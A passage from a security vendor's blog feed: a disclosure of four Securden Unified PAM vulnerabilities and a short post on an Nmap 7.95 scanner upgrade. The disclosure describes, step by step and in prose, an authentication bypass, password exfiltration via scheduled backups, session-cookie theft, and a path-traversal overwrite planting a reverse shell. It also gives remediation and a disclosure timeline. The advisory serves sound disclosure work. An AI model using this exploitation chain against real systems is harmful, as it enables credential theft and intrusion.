data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd2eb52cf4b8382fc/68ac659f98564f5546b47f23/SD1.png" data-sys-asset-uid="bltd2eb52cf4b8382fc" data-sys-asset-filename="SD1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD1.png" sys-style-type="display"/></figure><h3><span style='font-size: undefined;'>/get_csrf_token</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Using the securdensession cookie, Rapid7 browsed to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/get_csrf_token</span></span><span style='font-size: undefined;'> and obtained a CSRF token and securdenpost cookie.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt760fd522b0d2a602/68ac65d2974c2bf2c1e6bc58/SD2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD2.png" asset-alt="SD2.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt760fd522b0d2a602/68ac65d2974c2bf2c1e6bc58/SD2.png" data-sys-asset-uid="blt760fd522b0d2a602" data-sys-asset-filename="SD2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD2.png" sys-style-type="display"/></figure><h3><span style='font-size: undefined;'>Exploiting the backup features</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 then obtained the application server’s next start time for its scheduled tasks, using the authentication bypass to query </span><span style='font-size: undefined;'><span data-type='inlineCode'>/get_date_picker_format</span></span><span style='font-size: undefined;'>:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3f6f01d084346038/68ac65d295b27da8c7c6aed5/SD3.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD3.png" asset-alt="SD3.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3f6f01d084346038/68ac65d295b27da8c7c6aed5/SD3.png" data-sys-asset-uid="blt3f6f01d084346038" data-sys-asset-filename="SD3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD3.png" sys-style-type="display"/></figure><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>A request was then sent to </span><span style='font-size: undefined;'><span data-type='inlineCode'>/configure_schedule</span></span><span style='font-size: undefined;'> with the </span><span style='font-size: undefined;'><span data-type='inlineCode'>SCHEDULE_ENCRYPTED_HTML_BACKUP</span></span><span style='font-size: undefined;'> type, next task start date, a passphrase, and a location to write the backup file to. An attacker can choose to host an SMB share and have the file dropped there, or place it in the Unified PAM’s </span><span style='font-size: undefined;'><span data-type='inlineCode'>/static/</span></span><span style='font-size: undefined;'> webroot folder, allowing unauthenticated download of the file via the application’s web server. This request required the obtained CSRF token along with the securdenpost and securdensession cookies.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note</strong></em></span><span style='font-size: undefined;'><em>: The written filename is not controlled by the attacker, nor is it a static name. However, as it is based on the date of the backup, the name can be guessed via brute forcing to download it from the web server.</em></span></p><p><span style='font-size: undefined;'><em></em></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt285e2e8213634662/68ac65d236f57ee448e743fb/SD4.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD4.png" asset-alt="SD4.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt285e2e8213634662/68ac65d236f57ee448e743fb/SD4.png" data-sys-asset-uid="blt285e2e8213634662" data-sys-asset-filename="SD4.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD4.png" sys-style-type="display"/></figure><p style="direction: ltr;"><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'>After waiting for the task to start, we see an SMB connection from PAM, writing the backup file to Rapid7’s SMB share.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em><strong>Note</strong></em></span><span style='font-size: undefined;'><em>: This SMB connection could also be leveraged in a pass-back and NTLMv2 relay attack, as well as offline NTLMv2 hash cracking of the service account running the Unified PAM application. </em></span></p><p><span style='font-size: undefined;'><em></em></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9fc39ba84dfaefc5/68ac65d24f9d3d57c2821829/SD5.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD5.png" asset-alt="SD5.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9fc39ba84dfaefc5/68ac65d24f9d3d57c2821829/SD5.png" data-sys-asset-uid="blt9fc39ba84dfaefc5" data-sys-asset-filename="SD5.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD5.png" sys-style-type="display"/></figure><p style="direction: ltr;"><span style='font-size: undefined;'>The backup file can be decrypted using the password defined by the attacker, revealing a full backup of all passwords stored in the Unified PAM:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfa3c48cd40030e59/68ac65d2c42f683ad0c4deac/SD6.png" height="393" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD6.png" asset-alt="SD6.png" width="447" max-width="447" max-height="393" style="max-width: 447px; width: 447px; max-height: 393px; height: 393px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfa3c48cd40030e59/68ac65d2c42f683ad0c4deac/SD6.png" data-sys-asset-uid="bltfa3c48cd40030e59" data-sys-asset-filename="SD6.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD6.png" sys-style-type="display"/></figure><h3><span style='font-size: undefined;'>Database backups when the “superadmin” is not enabled</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>When the </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> user is not enabled, the application won’t create the encrypted password file. Still, it is possible to extract a backup of the entire Unified PAM application’s database. This database stores the credentials in an encrypted format, which cannot be decrypted unless the attacker has a key file on the application server. Instead, an attacker can extract active session tokens (cookies) from the database and impersonate user sessions, which can then be used to extract passwords through normal application workflows.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To backup the entire database instead of the encrypted passwords file, because of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>superadmin</span></span><span style='font-size: undefined;'> user not being enabled, the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/configure_schedule</span></span><span style='font-size: undefined;'> request can also be sent with </span><span style='font-size: undefined;'><span data-type='inlineCode'>DATABASE_BACKUP</span></span><span style='font-size: undefined;'> as the </span><span style='font-size: undefined;'><span data-type='inlineCode'>schedule_type</span></span><span style='font-size: undefined;'> and the </span><span style='font-size: undefined;'><span data-type='inlineCode'>backup_location</span></span><span style='font-size: undefined;'> can once again be set to PAM’s static folder or an external share. </span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0c972bd5bc0d271f/68ac65d298564fbec0b47f27/SD7.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD7.png" asset-alt="SD7.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0c972bd5bc0d271f/68ac65d298564fbec0b47f27/SD7.png" data-sys-asset-uid="blt0c972bd5bc0d271f" data-sys-asset-filename="SD7.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD7.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The backup file will have a predictable filename: </span><span style='font-size: undefined;'><span data-type='inlineCode'>Securden-&lt;version&gt;_postgresql_db_backup_&lt;day&gt;_&lt;Month&gt;_&lt;year&gt;_&lt;hour&gt;_&lt;minute&gt;_&lt;second&gt;.zip</span></span><span style='font-size: undefined;'>. By sending brute-force requests to the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/static/</span></span><span style='font-size: undefined;'> folder, the attacker can reliably guess the last two </span><span style='font-size: undefined;'><span data-type='inlineCode'>&lt;second&gt;</span></span><span style='font-size: undefined;'> digits of the file name and access the backup file.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>While passwords and other sensitive information is encrypted in the backup file, Django session cookies are not. The exploit can be automated to run a backup every five minutes; when a user signs in, their cookie can be found in the database. </span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfbe494f01a5668b2/68ac65d2a77657ea37c2e9a1/SD8.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD8.png" asset-alt="SD8.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltfbe494f01a5668b2/68ac65d2a77657ea37c2e9a1/SD8.png" data-sys-asset-uid="bltfbe494f01a5668b2" data-sys-asset-filename="SD8.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD8.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>If the timing is right and the cookie is still valid, it can be used to login as the user.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f44da8db34a9b1a/68ac65d2b1a8c0fca14fd86f/SD9.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD9.png" asset-alt="SD9.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5f44da8db34a9b1a/68ac65d2b1a8c0fca14fd86f/SD9.png" data-sys-asset-uid="blt5f44da8db34a9b1a" data-sys-asset-filename="SD9.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD9.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><h2>CVE-2025-53119 / CVE-2025-53120: Unauthenticated Unrestricted File Upload and Path Traversal In File Upload</h2><p></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-53119</strong></span><span style='font-size: undefined;'> - The </span><span style='font-size: undefined;'><span data-type='inlineCode'>/accountapp/upload_web_recordings_from_api_server</span></span><span style='font-size: undefined;'> request allows for unrestricted file upload without authentication. Attackers can upload any file with any filetype to the server’s web recordings directory.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE-2025-53120</strong></span><span style='font-size: undefined;'> - Arbitrary files can be overwritten with path traversal characters in the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file_name</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>relative_path</span></span><span style='font-size: undefined;'> parameters of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>/accountapp/upload_web_recordings_from_api_server</span></span><span style='font-size: undefined;'> request . </span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>These can be leveraged for remote code execution in multiple ways. As an example, in the screenshot below, the </span><span style='font-size: undefined;'><span data-type='inlineCode'>postgresBackup.bat</span></span><span style='font-size: undefined;'> file was overwritten with a malicious PowerShell command that would send a reverse shell to the attacker. The file was overwritten by editing the </span><span style='font-size: undefined;'><span data-type='inlineCode'>file_name</span></span><span style='font-size: undefined;'> and </span><span style='font-size: undefined;'><span data-type='inlineCode'>relative_path</span></span><span style='font-size: undefined;'> parameters to point to the </span><span style='font-size: undefined;'><span data-type='inlineCode'>postgresBackup.bat</span></span><span style='font-size: undefined;'> file. In this request, the exact value of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>relative_path</span></span><span style='font-size: undefined;'> parameter is arbitrary. It only needs to traverse one directory back with </span><span style='font-size: undefined;'><span data-type='inlineCode'>.../&lt;arbitrary_string&gt;</span></span><span style='font-size: undefined;'>. The </span><span style='font-size: undefined;'><span data-type='inlineCode'>postgresBackup.bat</span></span><span style='font-size: undefined;'> batch script is present by default and runs whenever a database backup occurs.</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4b94494dc389175/68ac65d278db105560f47323/SD10.png" height="443" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD10.png" asset-alt="SD10.png" width="617" max-width="617" max-height="443" style="max-width: 617px; width: 617px; max-height: 443px; height: 443px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltf4b94494dc389175/68ac65d278db105560f47323/SD10.png" data-sys-asset-uid="bltf4b94494dc389175" data-sys-asset-filename="SD10.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD10.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>By exploiting the authentication bypass mentioned previously, CVE-2025-53118, a database backup can be triggered:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5fddc3d81ef15910/68ac65d2d7406237c616dd04/SD11.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD11.png" asset-alt="SD11.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5fddc3d81ef15910/68ac65d2d7406237c616dd04/SD11.png" data-sys-asset-uid="blt5fddc3d81ef15910" data-sys-asset-filename="SD11.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD11.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On backup, the application server runs the batch script containing the PowerShell reverse shell, and the attacker can run privileged OS commands on the PAM server:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2387ab5a8d250dab/68ac65d2d74062c6f816dd02/SD12.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD12.png" asset-alt="SD12.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt2387ab5a8d250dab/68ac65d2d74062c6f816dd02/SD12.png" data-sys-asset-uid="blt2387ab5a8d250dab" data-sys-asset-filename="SD12.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD12.png" sys-style-type="display"/></figure><h2>CVE-2025-6737: Shared SSH Key and Cloud Infrastructure</h2><p style="direction: ltr;"><span style='font-size: undefined;'>While reviewing application logs produced by Securden’s Unified PAM (version 11.2.5), Rapid7 discovered an entry indicating that the application server had established a reverse SSH tunnel to a remote server, using a key placed on disk, exposing the login page for Rapid7’s local Unified PAM used for testing:</span></p><p></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14179b2670b4c87c/68ac65d2b3421a6c12096803/SD13.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD13.png" asset-alt="SD13.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14179b2670b4c87c/68ac65d2b3421a6c12096803/SD13.png" data-sys-asset-uid="blt14179b2670b4c87c" data-sys-asset-filename="SD13.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD13.png" sys-style-type="display"/></figure><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>At first, Rapid7 investigated the IP, as it was foreign, and reviewing additional logs within “reversetunnelcreator.log” revealed an IP address that was hosted in South Korea:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c60508d2c85e9f8/68ac65d236f57e3306e743f7/SD14.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD14.png" asset-alt="SD14.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt3c60508d2c85e9f8/68ac65d236f57e3306e743f7/SD14.png" data-sys-asset-uid="blt3c60508d2c85e9f8" data-sys-asset-filename="SD14.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD14.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Additionally, Rapid7 discovered that the SSH key </span><span style='font-size: undefined;'><span data-type='inlineCode'>tunnel-user-key.pem</span></span><span style='font-size: undefined;'> was deleted from disk after the tunnel was established. Using PowerShell, Rapid7 wrote a small loop to monitor file write events for the key and copy it, and then restarted the Securden service, noticing that SSH log entries aligned with service and server restart times:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0b5b79f931c4beb/68ac65d27ff584ed66187a2e/SD15.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD15.png" asset-alt="SD15.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc0b5b79f931c4beb/68ac65d27ff584ed66187a2e/SD15.png" data-sys-asset-uid="bltc0b5b79f931c4beb" data-sys-asset-filename="SD15.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD15.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 executed the SSH command which their Unified PAM server utilized, connecting to 18.217.245.55’s SSH service on port 443. Without context into the functionality, Rapid7 originally thought this may have been an update server deployed by Securden to push down new packages. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To check if the server was exposing the admin panel for Rapid7’s local PAM server used for testing, Rapid7 ran a netstat command, discovering several other tunnels and connections from various IP addresses:</span></p><p><span style='font-size: undefined;'></span></p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc9039741edbc11e5/68ac659fe1265f2411cdd0de/SD16.png" height="408" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="SD16.png" asset-alt="SD16.png" width="510" max-width="510" max-height="408" style="max-width: 510px; width: 510px; max-height: 408px; height: 408px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltc9039741edbc11e5/68ac659fe1265f2411cdd0de/SD16.png" data-sys-asset-uid="bltc9039741edbc11e5" data-sys-asset-filename="SD16.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="SD16.png" sys-style-type="display"/></figure><p><span style='font-size: undefined;'></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Realizing that this server was Securden’s infrastructure with shared connections between multiple software deployments, Rapid7 exited the host. Rapid7 then reviewed the Unified PAM application’s functionality, focusing in on what created the SSH tunnel and where it was being used. Rapid7 discovered that it was a part of the </span><span style='font-size: undefined;'><span data-type='inlineCode'>Vendor Access Portal</span></span><span style='font-size: undefined;'>, which allows customers to expose a vendor login page on the internet to their internally-hosted Unified PAM instance. However, while testing with different deployed instances and </span><span style='font-size: undefined;'><span data-type='inlineCode'>vendor names</span></span><span style='font-size: undefined;'>, Rapid7 observed that the key generation process, username, and host IP address SSHed into and used to establish this tunnel were the same across installations.</span></p><h2>Remediation</h2><p style="direction: ltr;"><span style='font-size: undefined;'>To remediate the issues described in this disclosure, customers should update Securden Unified PAM to version 11.4.4 or higher. Securden has declined to publish a public advisory on these issues. More details about Securden Unified PAM can be found </span><a href="https://www.securden.com/privileged-account-manager/index.html"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'>.</span></p><h2>Rapid7 customers</h2><p style="direction: ltr;">Nexpose and InsightVM customers can assess their exposure to CVE-2025-53118, CVE-2025-53119, CVE-2025-53120, and CVE-2025-6737 with unauthenticated/remote checks made available in the August 25 content release.</p><h2>Disclosure timeline</h2><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 2025:</strong></span><span style='font-size: undefined;'> First three vulnerabilities (CVE-2025-53118, CVE-2025-53119, CVE-2025-53120) discovered by Marcus Chang, Vendor Portal vulnerabilities (CVE-2025-6737) discovered by Aaron Herndon, both of Rapid7.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 22, 2025:</strong></span><span style='font-size: undefined;'> Initial email to Securden asking for confirmation of a point of contact to send vulnerability information.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 22, 2025:</strong></span><span style='font-size: undefined;'> Securden confirmed the point of contact.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 22, 2025:</strong></span><span style='font-size: undefined;'> Vulnerability details provided to Securden.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>May 30, 2025:</strong></span><span style='font-size: undefined;'> Securden sent patch intended to remediate the issues.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 3, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 tested the patch and confirmed all vulnerabilities were remediated.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 5, 2025:</strong></span><span style='font-size: undefined;'> Aaron Herndon reported further vulnerabilities with the Vendor Portal functionality.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 6, 2025:</strong></span><span style='font-size: undefined;'> Securden provided another patch intended to remediate newly identified vulnerabilities.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 9, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 tested the patch provided on June 6 and confirmed vulnerabilities discovered on June 5 were remediated.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>June 26, 2025:</strong></span><span style='font-size: undefined;'> Securden provided a general timeframe for public disclosure.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2025:</strong></span><span style='font-size: undefined;'> Securden provided a specific public disclosure date.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 requested a different public disclosure date.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>July 29, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 informed Securden of the assigned CVE IDs.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 5, 2025:</strong></span><span style='font-size: undefined;'> Securden provided a specific public disclosure date.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 21, 2025:</strong></span><span style='font-size: undefined;'> Rapid7 requested specific vulnerable version numbers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 21, 2025:</strong></span><span style='font-size: undefined;'> Securden provided specific vulnerable version numbers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 22, 2025:</strong></span><span style='font-size: undefined;'> Securden provided Vendor Statement.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>August 25, 2025:</strong></span><span style='font-size: undefined;'> Public disclosure via publication of this blog post.</span></p></li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/securden-unified-pam-multiple-critical-vulnerabilities-fixed</link>
      <guid isPermaLink="false">blt5bf5fc2194f1489c</guid>
      <category><![CDATA[Vulnerability Disclosure]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Aaron Herndon]]></dc:creator>
      <pubDate>Mon, 25 Aug 2025 16:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt65a432ba319f4043/6846abddaf18306debe6cf4d/ETR.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Announcing Nmap 7.95 Upgrade and More Accurate Simple Network Management Protocol (SNMP) Fingerprinting]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our commitment is to provide you with the most accurate and reliable scan data possible; as such, we are continuously updating our underlying technology. Today we are excited to announce an upcoming enhancement to the InsightVM scan engine, aimed at improving the accuracy of Simple Network Management Protocol (SNMP) fingerprinting in unauthenticated scans and reducing false positives in your scan results.</span></p><h2>What's changing?</h2><p style="direction: ltr;"><span style='font-size: undefined;'>InsightVM is being upgraded to use a newer version of Nmap, moving from </span><span style='font-size: undefined;'><strong>version 7.92 to 7.95</strong></span><span style='font-size: undefined;'>, bringing significant improvements to how UDP ports are assessed. Our testing has revealed that the new version of Nmap is much more precise in identifying ambiguous ports, resulting in a significant decrease in ports being definitively marked as </span><span style='font-size: undefined;'><span data-type='inlineCode'>closed</span></span><span style='font-size: undefined;'> and a corresponding increase in ports being correctly identified as </span><span style='font-size: undefined;'><span data-type='inlineCode'>open|filtered</span></span><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This industry-wide improvement highlighted that our existing method for handling the ambiguous </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>open|filtered</span></span><span style='font-size: undefined;'> state during </span><span style='font-size: undefined;'><strong>unauthenticated SNMPv1 and SNMPv2 fingerprinting</strong></span><span style='font-size: undefined;'> could report false positives to customers. With the new UDP port detection in Nmap, the frequency of these false positives would likely increase, so we have updated our fingerprinting process to be more reliable.</span></p><h2>Increasing reliability and reducing false positives</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For unauthenticated scans, our platform will now adopt a more direct approach to identifying SNMP services. This change is designed to deliver more accurate results and reduce the noise from potential false positives. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Authenticated scans that use valid SNMP credentials are not affected by this change. Also, due to the nature of the protocol, this update does not affect SNMPv3 scanning.</span></p><h2>What this means for your scans</h2><p style="direction: ltr;"><span style='font-size: undefined;'>With this new, more accurate behavior, reliable fingerprinting of SNMPv1 and v2 services will be achieved under the following conditions:</span></p><ol><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>An unauthenticated scan</strong></span><span style='font-size: undefined;'> against an SNMP asset that is using one of the common, default community strings that our scanner checks for.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>An authenticated scan</strong></span><span style='font-size: undefined;'> against any SNMP asset where you have provided valid credentials.</span></p></li></ol><p style="direction: ltr;"><span style='font-size: undefined;'>A key benefit of this change is a reduction in false positives, particularly for certain types of SNMPv1 and SNMPv2 servers. </span></p><h2><span style='font-size: undefined;'>Which SNMPv1 and SNMPv2 servers will see this change?</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>This change is unlikely to affect most </span><span style='font-size: undefined;'><strong>Linux</strong></span><span style='font-size: undefined;'> SNMPv1 and SNMPv2 servers, as they typically respond with an authentication error to incorrect community strings, allowing our scanner to confirm the service is running. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The native SNMP service on </span><span style='font-size: undefined;'><strong>Windows</strong></span><span style='font-size: undefined;'> is designed to silently drop packets when a non-default community string is used. Our previous method may have incorrectly flagged these </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>open|filtered</span></span><span style='font-size: undefined;'> ports as a running service. With the new logic, our scanner will no longer attempt to fingerprint SNMP in these ambiguous cases, significantly improving accuracy for these assets. This also applies to </span><span style='font-size: undefined;'><strong>other network devices</strong></span><span style='font-size: undefined;'> that adopt a similar "silent drop" security posture.</span></p><h2>Our recommendations</h2><p style="direction: ltr;"><span style='font-size: undefined;'>For the most accurate and reliable fingerprinting of your SNMPv1 and v2 servers, </span><span style='font-size: undefined;'><strong>we strongly recommend configuring your scans with credentials.</strong></span><span style='font-size: undefined;'> Authenticated scanning is a security best practice that provides the most detailed and accurate information about the services running on your assets.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We are confident that this enhancement will improve the quality of your scan data and help you focus on what matters most.</span></p><hr><p style="direction: ltr;"><span style='font-size: undefined;'><em>You can check out Rapid7’s Vulnerability Management solution, InsightVM, in greater detail </em></span><a href="https://www.rapid7.com/products/insightvm/"><span style='font-size: undefined;'>here</span></a><span style='font-size: undefined;'><em>.</em></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/announcing-nmap-7-95-upgrade-and-more-accurate-simple-network-management-protocol-fingerprinting</link>
      <guid isPermaLink="false">bltee406d18b65144aa</guid>
      <category><![CDATA[Vulnerability Management]]></category>
      <category><![CDATA[InsightVM]]></category><dc:creator><![CDATA[Conor McCormick]]></dc:creator>
      <pubDate>Fri, 15 Aug 2025 13:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt44d1c4df2ea08e27/67c8409fc1fe9636d8552a0d/product-ui-disco.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - August 2025]]></title>
